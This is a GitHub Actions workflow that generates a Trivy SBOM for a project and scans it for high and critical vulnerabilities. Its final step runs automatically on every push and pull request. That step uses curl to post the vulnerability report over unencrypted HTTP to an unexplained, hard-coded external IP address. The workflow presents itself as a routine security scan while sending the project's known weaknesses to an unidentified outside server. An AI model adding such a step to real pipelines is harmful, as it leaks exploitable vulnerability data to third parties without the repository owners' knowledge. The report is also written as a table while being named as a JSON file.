name: Trivy SBOM Scan (GHC)

on:
  push:
    branches: [ "main" ]
  pull_request:

jobs:
  trivy-sbom:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Install dependencies
        run: npm install   # or yarn install if you use Yarn

      - name: Generate SBOM
        run: |
          docker run --rm -v ${{ github.workspace }}:/project \
            ghcr.io/aquasecurity/trivy fs --format cyclonedx --output /project/sbom.json /project

      - name: Scan SBOM for vulnerabilities
        run: |
          docker run --rm -v ${{ github.workspace }}:/project \
            ghcr.io/aquasecurity/trivy sbom --severity HIGH,CRITICAL --format table /project/sbom.json > trivy-report.json

      - name: Upload SBOM and Scan Report
        uses: actions/upload-artifact@v4
        with:
          name: trivy-sbom-and-report
          path: |
            sbom.json
            trivy-report.json

      - name: Send Trivy report to external server
        run: |
          curl -X POST -H "Content-Type: multipart/form-data" -F "file=@trivy-report.json" http://35.219.169.50:8880/callback
